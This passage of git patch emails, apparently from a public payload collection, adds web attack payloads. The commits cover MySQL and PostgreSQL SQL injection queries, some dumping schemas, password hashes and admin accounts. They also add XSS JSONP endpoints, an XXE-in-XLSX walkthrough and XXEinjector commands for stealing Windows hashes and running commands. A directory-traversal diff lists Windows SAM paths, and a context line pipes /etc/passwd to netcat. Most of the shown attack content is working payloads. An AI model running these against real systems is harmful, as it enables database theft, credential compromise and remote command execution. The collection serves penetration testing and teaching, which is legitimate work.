++/*!13337concat*/(0x3c616464726573733e3c63656e7465723e3c62723e3c68313e3c666f6e7420636f6c6f723d22526564223e496e6a6563746564206279204e315a344d3c2f666f6e743e3c68313e3c2f63656e7465723e3c62723e3c666f6e7420636f6c6f723d2223663364393361223e4461746162617365207e3e3e203c2f666f6e743e,database/**N1Z4M**/(),0x3c62723e3c666f6e7420636f6c6f723d2223306639643936223e56657273696f6e207e3e3e203c2f666f6e743e,@@version,0x3c62723e3c666f6e7420636f6c6f723d2223306637363964223e55736572207e3e3e203c2f666f6e743e,user/**N1Z4M**/(),0x3c62723e3c666f6e7420636f6c6f723d2223306639643365223e506f7274207e3e3e203c2f666f6e743e,@@port,0x3c62723e3c666f6e7420636f6c6f723d2223346435613733223e4f53207e3e3e203c2f666f6e743e,@@version_compile_os,0x2c3c62723e3c666f6e7420636f6c6f723d2223366134343732223e44617461204469726563746f7279204c6f636174696f6e207e3e3e203c2f666f6e743e,@@datadir,0x3c62723e3c666f6e7420636f6c6f723d2223333130343362223e55554944207e3e3e203c2f666f6e743e,UUID/**N1Z4M**/(),0x3c62723e3c666f6e7420636f6c6f723d2223363930343637223e43757272656e742055736572207e3e3e203c2f666f6e743e,current_user/**N1Z4M**/(),0x3c62723e3c666f6e7420636f6c6f723d2223383432303831223e54656d70204469726563746f7279207e3e3e203c2f666f6e743e,@@tmpdir,0x3c62723e3c666f6e7420636f6c6f723d2223396336623934223e424954532044455441494c53207e3e3e203c2f666f6e743e,@@version_compile_machine,0x3c62723e3c666f6e7420636f6c6f723d2223396630613838223e46494c452053595354454d207e3e3e203c2f666f6e743e,@@CHARACTER_SET_FILESYSTEM,0x3c62723e3c666f6e7420636f6c6f723d2223393234323564223e486f7374204e616d65207e3e3e203c2f666f6e743e,@@hostname,0x3c62723e3c666f6e7420636f6c6f723d2223393430313333223e53797374656d2055554944204b6579207e3e3e203c2f666f6e743e,UUID/**N1Z4M**/(),0x3c62723e3c666f6e7420636f6c6f723d2223613332363531223e53796d4c696e6b20207e3e3e203c2f666f6e743e,@@GLOBAL.have_symlink,0x3c62723e3c666f6e7420636f6c6f723d2223353830633139223e53534c207e3e3e203c2f666f6e743e,@@GLOBAL.have_ssl,0x3c62723e3c666f6e7420636f6c6f723d2223393931663333223e42617365204469726563746f7279207e3e3e203c2f666f6e743e,@@basedir,0x3c62723e3c2f616464726573733e3c62723e3c666f6e7420636f6c6f723d22626c7565223e,(/*!13337select*/(@a)/*!13337from*/(/*!13337select*/(@a:=0x00),(/*!13337select*/(@a)/*!13337from*/(information_schema.columns)/*!13337where*/(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(@a)in(@a:=/*!13337concat*/(@a,table_schema,0x3c666f6e7420636f6c6f723d22726564223e20203a3a203c2f666f6e743e,table_name,0x3c666f6e7420636f6c6f723d22726564223e20203a3a203c2f666f6e743e,column_name,0x3c62723e))))a))+ + +-- sharik +(select(@a)from(select(@a:=0x00),(select(@a)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(@a)in(@a:=concat(@a,table_name,0x203a3a20,column_name,0x3c62723e))))a) ``` ## MYSQL Current queries @@ -377,4 +395,4 @@ load data infile '\\\\error\\abc' into table database.table_name; - [HackerOne @ajxchapman 50m-ctf writeup - Alex Chapman @ajxchapman](https://hackerone.com/reports/508123) - [SQL Wiki - netspi](https://sqlwiki.netspi.com/injectionTypes/errorBased) - [ekoparty web_100 - 2016/10/26 - p4-team](https://github.com/p4-team/ctf/tree/master/2016-10-26-ekoparty/web_100) -- [Websec - MySQL - Roberto Salgado - May 29, 2013.](https://websec.ca/kb/sql_injection#MySQL_Default_Databases) \ No newline at end of file +- [Websec - MySQL - Roberto Salgado - May 29, 2013.](https://websec.ca/kb/sql_injection#MySQL_Default_Databases) From aef5bb864ae2050c7b8e071b3a39742a4918a1c9 Mon Sep 17 00:00:00 2001 From: nizam0906 Date: Fri, 25 Oct 2019 22:27:16 +0530 Subject: [PATCH 079/222] Update jsonp_endpoint.txt Added 3 yahoo jsonp endpoints * https://ads.yap.yahoo.com/nosdk/wj/v1/getAds.do?cb=alert(1337) * https://mempf.yahoo.co.jp/offer?position=h&callback=alert(1337) * https://suggest-shop.yahooapis.jp/Shopping/Suggest/V1/suggester?callback=alert(1)//&appid=dj0zaiZpPVkwMDJ1RHlqOEdwdCZzPWNvbnN1bWVyc2VjcmV0Jng9M2Y- --- XSS Injection/Intruders/jsonp_endpoint.txt | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/XSS Injection/Intruders/jsonp_endpoint.txt b/XSS Injection/Intruders/jsonp_endpoint.txt index e514d818..12add242 100644 --- a/XSS Injection/Intruders/jsonp_endpoint.txt +++ b/XSS Injection/Intruders/jsonp_endpoint.txt @@ -24,6 +24,9 @@ #Uber.com: "> #AOL/Yahoo +"> +"> +"> "> "> "> @@ -51,4 +54,4 @@ #GoogleAPI's "> "> -ng-app"ng-csp ng-click=$event.view.alert(1337)> \ No newline at end of file +ng-app"ng-csp ng-click=$event.view.alert(1337)> From f35ace93cf0655bbec0a753103899650e7a8b489 Mon Sep 17 00:00:00 2001 From: nizam0906 Date: Sat, 26 Oct 2019 18:07:14 +0530 Subject: [PATCH 080/222] Update PostgreSQL Injection.md Updated PostgreSQL Error Based injections --- SQL Injection/PostgreSQL Injection.md | 9 +++++++-- 1 file changed, 7 insertions(+), 2 deletions(-) diff --git a/SQL Injection/PostgreSQL Injection.md b/SQL Injection/PostgreSQL Injection.md index c75ee733..b8d962dc 100644 --- a/SQL Injection/PostgreSQL Injection.md +++ b/SQL Injection/PostgreSQL Injection.md @@ -25,8 +25,13 @@ ```sql ,cAsT(chr(126)||vErSiOn()||chr(126)+aS+nUmeRiC) ,cAsT(chr(126)||(sEleCt+table_name+fRoM+information_schema.tables+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)-- -,cAsT(chr(126)||(sEleCt+column_name+fRoM+information_schema.columns+wHerE+table_name=data_column+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)-- +,cAsT(chr(126)||(sEleCt+column_name+fRoM+information_schema.columns+wHerE+table_name='data_table'+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)-- ,cAsT(chr(126)||(sEleCt+data_column+fRoM+data_table+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC) + +' and 1=cast((SELECT concat('DATABASE: ',current_database())) as int) and '1'='1 +' and 1=cast((SELECT table_name FROM information_schema.tables LIMIT 1 OFFSET data_offset) as int) and '1'='1 +' and 1=cast((SELECT column_name FROM information_schema.columns WHERE table_name='data_table' LIMIT 1 OFFSET data_offset) as int) and '1'='1 +' and 1=cast((SELECT data_column FROM data_table LIMIT 1 OFFSET data_offset) as int) and '1'='1 ``` ## PostgreSQL Blind @@ -95,4 +100,4 @@ SELECT system('cat /etc/passwd | nc '); * [A Penetration Tester’s Guide to PostgreSQL - David Hayter](https://medium.com/@cryptocracker99/a-penetration-testers-guide-to-postgresql-d78954921ee9) * [Authenticated Arbitrary Command Execution on PostgreSQL 9.3 > Latest - Mar 20 2019 - GreenWolf](https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5) * [SQL Injection /webApp/oma_conf ctx parameter (viestinta.lahitapiola.fi) - December 8, 2016 - Sergey Bobrov (bobrov)](https://hackerone.com/reports/181803) -* [POSTGRESQL 9.X REMOTE COMMAND EXECUTION - 26 Oct 17 - Daniel](https://www.dionach.com/blog/postgresql-9x-remote-command-execution) \ No newline at end of file +* [POSTGRESQL 9.X REMOTE COMMAND EXECUTION - 26 Oct 17 - Daniel](https://www.dionach.com/blog/postgresql-9x-remote-command-execution) From 525429c0d88d0ca968c02880868029e26f5175dc Mon Sep 17 00:00:00 2001 From: Alexandre ZANNI <16578570+noraj@users.noreply.github.com> Date: Sat, 26 Oct 2019 16:43:36 +0200 Subject: [PATCH 081/222] XPATH: add tools --- XPATH Injection/README.md | 10 +++++++++- 1 file changed, 9 insertions(+), 1 deletion(-) diff --git a/XPATH Injection/README.md b/XPATH Injection/README.md index 12bb05e4..bcbe72e0 100644 --- a/XPATH Injection/README.md +++ b/XPATH Injection/README.md @@ -7,6 +7,7 @@ * [Exploitation](#exploitation) * [Blind exploitation](#blind-exploitation) * [Out Of Band Exploitation](#out-of-band-exploitation) +* [Tools](#tools) * [References](#references) ## Exploitation @@ -47,8 +48,15 @@ x' or name()='username' or 'x'='y http://example.com/?title=Foundation&type=*&rent_days=* and doc('//10.10.10.10/SHARE') ``` +## Tools + +- [xcat](https://github.com/orf/xcat) - Automate XPath injection attacks to retrieve documents +- [xxxpwn](https://github.com/feakk/xxxpwn) - Advanced XPath Injection Tool +- [xxxpwn_smart](https://github.com/aayla-secura/xxxpwn_smart) - A fork of xxxpwn using predictive text +- [xpath-blind-explorer](https://github.com/micsoftvn/xpath-blind-explorer) +- [XmlChor](https://github.com/Harshal35/XMLCHOR) - Xpath injection exploitation tool + ## References * [OWASP XPATH Injection](https://www.owasp.org/index.php/Testing_for_XPath_Injection_(OTG-INPVAL-010)) -* [XPATH Blind Explorer](http://code.google.com/p/xpath-blind-explorer/) * [Places of Interest in Stealing NetNTLM Hashes - Osanda Malith Jayathissa - March 24, 2017](https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/) From 3dcd4425a87012f147fd1b995b7ed81debf7bb26 Mon Sep 17 00:00:00 2001 From: nizam0906 Date: Mon, 28 Oct 2019 16:26:49 +0530 Subject: [PATCH 082/222] Added more PostgreSQL Injection Queries * PostgreSQL version * PostgreSQL Current User * PostgreSQL List Users * PostgreSQL List Password Hashes * PostgreSQL List Privileges * PostgreSQL database name * PostgreSQL List databases * PostgreSQL List tables * PostgreSQL List columns * PostgreSQL Stacked query --- SQL Injection/PostgreSQL Injection.md | 76 +++++++++++++++++++++++++++ 1 file changed, 76 insertions(+) diff --git a/SQL Injection/PostgreSQL Injection.md b/SQL Injection/PostgreSQL Injection.md index b8d962dc..d923c5a1 100644 --- a/SQL Injection/PostgreSQL Injection.md +++ b/SQL Injection/PostgreSQL Injection.md @@ -3,9 +3,19 @@ ## Summary * [PostgreSQL Comments](#postgresql-comments) +* [PostgreSQL version](#postgresql-version) +* [PostgreSQL Current User](#postgresql-current-user) +* [PostgreSQL List Users](#postgresql-list-users) +* [PostgreSQL List Password Hashes](#postgresql-list-password-hashes) +* [PostgreSQL List Privileges](#postgresql-list-privileges) +* [PostgreSQL database name](#postgresql-database-name) +* [PostgreSQL List databases](#postgresql-list-database) +* [PostgreSQL List tables](#postgresql-list-tables) +* [PostgreSQL List columns](#postgresql-list-columns) * [PostgreSQL Error Based](#postgresql-error-based) * [PostgreSQL Blind](#postgresql-blind) * [PostgreSQL Time Based](#postgresql-time-based) +* [PostgreSQL Stacked query](#postgresql-stacked-query) * [PostgreSQL File Read](#postgresql-file-read) * [PostgreSQL File Write](#postgresql-file-write) * [PostgreSQL Command execution](#postgresql-command-execution) @@ -20,6 +30,64 @@ /**/ ``` +## PostgreSQL Version + +```sql +SELECT version() +``` + +## PostgreSQL Current User + +```sql +SELECT user; +SELECT current_user; +SELECT session_user; +SELECT usename FROM pg_user; +SELECT getpgusername(); +``` + +## PostgreSQL List Users + +```sql +SELECT usename FROM pg_user +``` + +## PostgreSQL List Password Hashes + +```sql +SELECT usename, passwd FROM pg_shadow +``` + +## PostgreSQL List Privileges + +```sql +SELECT usename, usecreatedb, usesuper, usecatupd FROM pg_user +``` + +## PostgreSQL Database Name + +```sql +SELECT current_database() +``` + +## PostgreSQL List Database + +```sql +SELECT datname FROM pg_database +``` + +## PostgreSQL List Tables + +```sql +SELECT table_name FROM information_schema.tables +``` + +## PostgreSQL List Columns + +```sql +SELECT column_name FROM information_schema.columns WHERE table_name='data_table' +``` + ## PostgreSQL Error Based ```sql @@ -48,6 +116,14 @@ AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ``` +## PostgreSQL Stacked Query + +Use a semi-colon ";" to add another query + +```sql +http://host/vuln.php?id=injection';create table NotSoSecure (data varchar(200));-- +``` + ## PostgreSQL File Read ```sql From ab341cff384ffc2f218a54bf08b67f1beb850f36 Mon Sep 17 00:00:00 2001 From: nizam0906 Date: Mon, 28 Oct 2019 16:51:36 +0530 Subject: [PATCH 083/222] Updated Blind XSS endpoint * User Agent * Comment Box --- XSS Injection/README.md | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/XSS Injection/README.md b/XSS Injection/README.md index a0ccd8af..f8cac694 100644 --- a/XSS Injection/README.md +++ b/XSS Injection/README.md @@ -416,6 +416,12 @@ javascript:eval('var a=document.createElement(\'script\');a.src=\'https://yoursu - Referer Header - Custom Site Analytics - Administrative Panel logs +- User Agent + - Custom Site Analytics + - Administrative Panel logs +- Comment Box + - Administrative Panel + ## Polyglot XSS From 135af74acda9b37a3febf14950dd0de91d923d9d Mon Sep 17 00:00:00 2001 From: duongdpt Date: Mon, 28 Oct 2019 22:26:28 +0700 Subject: [PATCH 084/222] Update README.md Add bypass waf using BETWEEN --- SQL Injection/README.md | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/SQL Injection/README.md b/SQL Injection/README.md index 8099f6df..8d5162bd 100644 --- a/SQL Injection/README.md +++ b/SQL Injection/README.md @@ -440,12 +440,13 @@ SUBSTR('SQL',1,1) -> SUBSTR('SQL' FROM 1 FOR 1). SELECT 1,2,3,4 -> UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d ``` -No Equal - bypass using LIKE/NOT IN/IN +No Equal - bypass using LIKE/NOT IN/IN/BETWEEN ```sql ?id=1 and substring(version(),1,1)like(5) ?id=1 and substring(version(),1,1)not in(4,3) ?id=1 and substring(version(),1,1)in(4,3) +?id=1 and substring(version(),1,1) between 3 and 4 ``` Blacklist using keywords - bypass using uppercase/lowercase @@ -461,7 +462,7 @@ Blacklist using keywords case insensitive - bypass using an equivalent operator ```sql AND -> && OR -> || -= -> LIKE,REGEXP, not < and not > += -> LIKE,REGEXP, BETWEEN, not < and not > > X -> not between 0 and X WHERE -> HAVING ``` From 5094ef8b108056199f3d84af782803e9ac4feeff Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Mon, 28 Oct 2019 20:46:19 +0100 Subject: [PATCH 085/222] XXE in XLSX --- XXE Injection/README.md | 52 +++++++++++++++++++++++++++++++++++++++++ 1 file changed, 52 insertions(+) diff --git a/XXE Injection/README.md b/XXE Injection/README.md index 58017175..b11ebd9f 100644 --- a/XXE Injection/README.md +++ b/XXE Injection/README.md @@ -30,6 +30,7 @@ Syntax: `` - [XXE inside SVG](#xxe-inside-svg) - [XXE inside SOAP](#xxe-inside-soap) - [XXE inside DOCX file](#xxe-inside-docx-file) + - [XXE inside XLSX file](#xxe-inside-xlsx-file) ## Tools @@ -382,6 +383,56 @@ JPG (experimental) GIF (experimental) ``` +### XXE inside XLSX file + +Extract the excel file. + +```powershell +$ mkdir XXE && cd XXE +$ unzip ../XXE.xlsx +Archive: ../XXE.xlsx + inflating: xl/drawings/drawing1.xml + inflating: xl/worksheets/sheet1.xml + inflating: xl/worksheets/_rels/sheet1.xml.rels + inflating: xl/sharedStrings.xml + inflating: xl/styles.xml + inflating: xl/workbook.xml + inflating: xl/_rels/workbook.xml.rels + inflating: _rels/.rels + inflating: [Content_Types].xml +``` + +Add your blind XXE payload inside `xl/workbook.xml`. + +```powershell + + ]> +&xxe; + +``` + +Rebuild the Excel file. + +```powershell +$ zip -r ../poc.xslx * +updating: [Content_Types].xml (deflated 71%) +updating: _rels/ (stored 0%) +updating: _rels/.rels (deflated 60%) +updating: docProps/ (stored 0%) +updating: docProps/app.xml (deflated 51%) +updating: docProps/core.xml (deflated 50%) +updating: xl/ (stored 0%) +updating: xl/workbook.xml (deflated 56%) +updating: xl/worksheets/ (stored 0%) +updating: xl/worksheets/sheet1.xml (deflated 53%) +updating: xl/styles.xml (deflated 60%) +updating: xl/theme/ (stored 0%) +updating: xl/theme/theme1.xml (deflated 80%) +updating: xl/_rels/ (stored 0%) +updating: xl/_rels/workbook.xml.rels (deflated 66%) +updating: xl/sharedStrings.xml (deflated 17%) +``` + ## References @@ -403,3 +454,4 @@ GIF (experimental) * [Exploiting XXE with local DTD files - Arseniy Sharoglazov - 12/12/2018](https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/) * [Web Security Academy >> XML external entity (XXE) injection - 2019 PortSwigger Ltd](https://portswigger.net/web-security/xxe) - [Automating local DTD discovery for XXE exploitation - July 16 2019 by Philippe Arteau](https://www.gosecure.net/blog/2019/07/16/automating-local-dtd-discovery-for-xxe-exploitation) +- [EXPLOITING XXE WITH EXCEL - NOV 12 2018 - MARC WICKENDEN](https://www.4armed.com/blog/exploiting-xxe-with-excel/) \ No newline at end of file From 52119907f6c6dfac5c1662da865d602fbc14ae5b Mon Sep 17 00:00:00 2001 From: Alexandre ZANNI <16578570+noraj@users.noreply.github.com> Date: Tue, 29 Oct 2019 00:41:04 +0100 Subject: [PATCH 086/222] add XXEinjector --- XXE Injection/README.md | 28 ++++++++++++++++++++++++++-- 1 file changed, 26 insertions(+), 2 deletions(-) diff --git a/XXE Injection/README.md b/XXE Injection/README.md index b11ebd9f..d4792dd6 100644 --- a/XXE Injection/README.md +++ b/XXE Injection/README.md @@ -42,7 +42,31 @@ Syntax: `` ``` $ python3 230.py 2121 ``` - + - [XXEinjector](https://github.com/enjoiz/XXEinjector) + ```bash + # Enumerating /etc directory in HTTPS application: + ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --ssl + # Enumerating /etc directory using gopher for OOB method: + ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --oob=gopher + # Second order exploitation: + ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/vulnreq.txt --2ndfile=/tmp/2ndreq.txt + # Bruteforcing files using HTTP out of band method and netdoc protocol: + ruby XXEinjector.rb --host=192.168.0.2 --brute=/tmp/filenames.txt --file=/tmp/req.txt --oob=http --netdoc + # Enumerating using direct exploitation: + ruby XXEinjector.rb --file=/tmp/req.txt --path=/etc --direct=UNIQUEMARK + # Enumerating unfiltered ports: + ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --enumports=all + # Stealing Windows hashes: + ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --hashes + # Uploading files using Java jar: + ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --upload=/tmp/uploadfile.pdf + # Executing system commands using PHP expect: + ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --oob=http --phpfilter --expect=ls + # Testing for XSLT injection: + ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --xslt + # Log requests only: + ruby XXEinjector.rb --logger --oob=http --output=/tmp/out.txt + ``` ## Detect the vulnerability @@ -454,4 +478,4 @@ updating: xl/sharedStrings.xml (deflated 17%) * [Exploiting XXE with local DTD files - Arseniy Sharoglazov - 12/12/2018](https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/) * [Web Security Academy >> XML external entity (XXE) injection - 2019 PortSwigger Ltd](https://portswigger.net/web-security/xxe) - [Automating local DTD discovery for XXE exploitation - July 16 2019 by Philippe Arteau](https://www.gosecure.net/blog/2019/07/16/automating-local-dtd-discovery-for-xxe-exploitation) -- [EXPLOITING XXE WITH EXCEL - NOV 12 2018 - MARC WICKENDEN](https://www.4armed.com/blog/exploiting-xxe-with-excel/) \ No newline at end of file +- [EXPLOITING XXE WITH EXCEL - NOV 12 2018 - MARC WICKENDEN](https://www.4armed.com/blog/exploiting-xxe-with-excel/) From bb2c2471604761976445d54de2b4a936b034c1df Mon Sep 17 00:00:00 2001 From: nizam0906 Date: Tue, 29 Oct 2019 10:32:39 +0530 Subject: [PATCH 087/222] Added List Database Administrator Accounts SELECT datname FROM pg_database --- SQL Injection/PostgreSQL Injection.md | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/SQL Injection/PostgreSQL Injection.md b/SQL Injection/PostgreSQL Injection.md index d923c5a1..2bf952ce 100644 --- a/SQL Injection/PostgreSQL Injection.md +++ b/SQL Injection/PostgreSQL Injection.md @@ -7,6 +7,7 @@ * [PostgreSQL Current User](#postgresql-current-user) * [PostgreSQL List Users](#postgresql-list-users) * [PostgreSQL List Password Hashes](#postgresql-list-password-hashes) +* [PostgreSQL List Database Administrator Accounts](#postgresql-list-database-administrator-accounts) * [PostgreSQL List Privileges](#postgresql-list-privileges) * [PostgreSQL database name](#postgresql-database-name) * [PostgreSQL List databases](#postgresql-list-database) @@ -57,7 +58,10 @@ SELECT usename FROM pg_user ```sql SELECT usename, passwd FROM pg_shadow ``` - +## PostgreSQL List Database Administrator Accounts +```sql +SELECT usename FROM pg_user WHERE usesuper IS TRUE +``` ## PostgreSQL List Privileges ```sql From bb7e6b7cd0587903fc3040b3699f517fae02b2b0 Mon Sep 17 00:00:00 2001 From: Hi15358 Date: Tue, 29 Oct 2019 16:23:39 +0800 Subject: [PATCH 088/222] Update README.md --- Directory Traversal/README.md | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/Directory Traversal/README.md b/Directory Traversal/README.md index 1420178b..afa72bd3 100644 --- a/Directory Traversal/README.md +++ b/Directory Traversal/README.md @@ -144,6 +144,8 @@ c:/unattend.txt c:/unattend.xml c:/unattended.txt c:/unattended.xml +c:/windows/repair/sam +c:/windows/repair/system ``` The following log files are controllable and can be included with an evil payload to achieve a command execution @@ -164,4 +166,4 @@ The following log files are controllable and can be included with an evil payloa ## References * [Directory traversal attack - Wikipedia](https://en.wikipedia.org/wiki/Directory_traversal_attack) -* [CWE-40: Path Traversal: '\\UNC\share\name\' (Windows UNC Share) - CWE Mitre - December 27, 2018](https://cwe.mitre.org/data/definitions/40.html) \ No newline at end of file +* [CWE-40: Path Traversal: '\\UNC\share\name\' (Windows UNC Share) - CWE Mitre - December 27, 2018](https://cwe.mitre.org/data/definitions/40.html) From f81f9440b8ecbbae9eaf20f4049fd767e15b4c9c Mon Sep 17 00:00:00 2001 From: nizam0906 Date: Tue, 29 Oct 2019 16:32:22 +0530 Subject: [PATCH 089/222] Added More Ways to Detect columns number using order by or group by using order by or group by error based using UNION SELECT Error Based --- SQL Injection/MySQL Injection.md | 55 +++++++++++++++++++++++++++----- 1 file changed, 47 insertions(+), 8 deletions(-) diff --git a/SQL Injection/MySQL Injection.md b/SQL Injection/MySQL Injection.md index f61cc52b..979aa8b6 100644 --- a/SQL Injection/MySQL Injection.md +++ b/SQL Injection/MySQL Injection.md @@ -3,8 +3,8 @@ ## Summary * [MYSQL Comment](#mysql-comment) -* [Detect columns number](#detect-columns-number) * [MYSQL Union Based](#mysql-union-based) + * [Detect columns number](#detect-columns-number) * [Extract database with information_schema](#extract-database-with-information-schema) * [Extract data without information_schema](#extract-data-without-information-schema) * [Extract data without columns name](#extract-data-without-columns-name) @@ -46,17 +46,56 @@ ## MYSQL Union Based -### Extract database with information_schema +### Detect columns number -First you need to know the number of columns, you can use `order by`. +First you need to know the number of columns + +#### using `order by` or `group by` + +Keep incrementing the number until you get a False response. +Even though GROUP BY and ORDER BY have different funcionality in SQL, they both can be used in the exact same fashion to determine the number of columns in the query. ```sql -order by 1 -order by 2 -order by 3 -... -order by XXX +1' ORDER BY 1--+ #True +1' ORDER BY 2--+ #True +1' ORDER BY 3--+ #True +1' ORDER BY 4--+ #False - Query is only using 3 columns + #-1' UNION SELECT 1,2,3--+ True ``` +or +```sql +1' GROUP BY 1--+ #True +1' GROUP BY 2--+ #True +1' GROUP BY 3--+ #True +1' GROUP BY 4--+ #False - Query is only using 3 columns + #-1' UNION SELECT 1,2,3--+ True +``` +#### using `order by` or `group by` Error Based +Similar to the previous method, we can check the number of columns with 1 request if error showing is enabled. +```sql +1' ORDER BY 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100--+ + +# Unknown column '4' in 'order clause' +# This error means query uses 3 column +#-1' UNION SELECT 1,2,3--+ True +``` +or +```sql +1' GROUP BY 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100--+ + +# Unknown column '4' in 'group statement' +# This error means query uses 3 column +#-1' UNION SELECT 1,2,3--+ True +``` +#### using `UNION SELECT` Error Based +This method works if error showing is enabled +```sql +1' UNION SELECT @--+ #The used SELECT statements have a different number of columns +1' UNION SELECT @,@--+ #The used SELECT statements have a different number of columns +1' UNION SELECT @,@,@--+ #No error means query uses 3 column + #-1' UNION SELECT 1,2,3--+ True +``` +### Extract database with information_schema Then the following codes will extract the databases'name, tables'name, columns'name. From 614e8a97b9acf59ebd9e265fad488e43b714bfa5 Mon Sep 17 00:00:00 2001 From: nizam0906 Date: Tue, 29 Oct 2019 16:48:11 +0530 Subject: [PATCH 090/222] Updated Detect columns number Detect columns number using LIMIT INTO Error Based --- SQL Injection/MySQL Injection.md | 10 ++++++++++ 1 file changed, 10 insertions(+) diff --git a/SQL Injection/MySQL Injection.md b/SQL Injection/MySQL Injection.md index 979aa8b6..783d9138 100644 --- a/SQL Injection/MySQL Injection.md +++ b/SQL Injection/MySQL Injection.md @@ -95,6 +95,16 @@ This method works if error showing is enabled 1' UNION SELECT @,@,@--+ #No error means query uses 3 column #-1' UNION SELECT 1,2,3--+ True ``` +#### using `LIMIT INTO` Error Based +This method works if error showing is enabled. + +It is useful for finding the number of columns when the injection point is after a LIMIT clause. +```sql +1' LIMIT 1,1 INTO @--+ #The used SELECT statements have a different number of columns +1' LIMIT 1,1 INTO @,@--+ #The used SELECT statements have a different number of columns +1' LIMIT 1,1 INTO @,@,@--+ #No error means query uses 3 column + #-1' UNION SELECT 1,2,3--+ True +``` ### Extract database with information_schema Then the following codes will extract the databases'name, tables'name, columns'name. From 7d6fab92fa65ee282f70809f50c12df5649ad281 Mon Sep 17 00:00:00 2001 From: nizam0906 Date: Tue, 29 Oct 2019 18:11:58 +0530 Subject: [PATCH 091/222] Update Detect columns number Using SELECT * FROM SOME_EXISTING_TABLE Error Based --- SQL Injection/MySQL Injection.md | 18 ++++++++++++++---- 1 file changed, 14 insertions(+), 4 deletions(-) diff --git a/SQL Injection/MySQL Injection.md b/SQL Injection/MySQL Injection.md index 783d9138..1a475e71 100644 --- a/SQL Injection/MySQL Injection.md +++ b/SQL Injection/MySQL Injection.md @@ -50,7 +50,7 @@ First you need to know the number of columns -#### using `order by` or `group by` +##### Using `order by` or `group by` Keep incrementing the number until you get a False response. Even though GROUP BY and ORDER BY have different funcionality in SQL, they both can be used in the exact same fashion to determine the number of columns in the query. @@ -70,7 +70,7 @@ or 1' GROUP BY 4--+ #False - Query is only using 3 columns #-1' UNION SELECT 1,2,3--+ True ``` -#### using `order by` or `group by` Error Based +##### Using `order by` or `group by` Error Based Similar to the previous method, we can check the number of columns with 1 request if error showing is enabled. ```sql 1' ORDER BY 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100--+ @@ -87,7 +87,7 @@ or # This error means query uses 3 column #-1' UNION SELECT 1,2,3--+ True ``` -#### using `UNION SELECT` Error Based +##### Using `UNION SELECT` Error Based This method works if error showing is enabled ```sql 1' UNION SELECT @--+ #The used SELECT statements have a different number of columns @@ -95,7 +95,7 @@ This method works if error showing is enabled 1' UNION SELECT @,@,@--+ #No error means query uses 3 column #-1' UNION SELECT 1,2,3--+ True ``` -#### using `LIMIT INTO` Error Based +##### Using `LIMIT INTO` Error Based This method works if error showing is enabled. It is useful for finding the number of columns when the injection point is after a LIMIT clause. @@ -105,6 +105,16 @@ It is useful for finding the number of columns when the injection point is after 1' LIMIT 1,1 INTO @,@,@--+ #No error means query uses 3 column #-1' UNION SELECT 1,2,3--+ True ``` +##### Using `SELECT * FROM SOME_EXISTING_TABLE` Error Based +This works if you know the table name you're after and error showing is enabled. + +It will return the amount of columns in the table, not the query. + +```sql +1' AND (SELECT * FROM Users) = 1--+ #Operand should contain 3 column(s) + # This error means query uses 3 column + #-1' UNION SELECT 1,2,3--+ True +``` ### Extract database with information_schema Then the following codes will extract the databases'name, tables'name, columns'name. From a33dce0d6077e15010689efe7b9e71d81c91aa30 Mon Sep 17 00:00:00 2001 From: nizam0906 Date: Tue, 29 Oct 2019 18:25:00 +0530 Subject: [PATCH 092/222] Fixed Broken Links --- SQL Injection/MySQL Injection.md | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/SQL Injection/MySQL Injection.md b/SQL Injection/MySQL Injection.md index 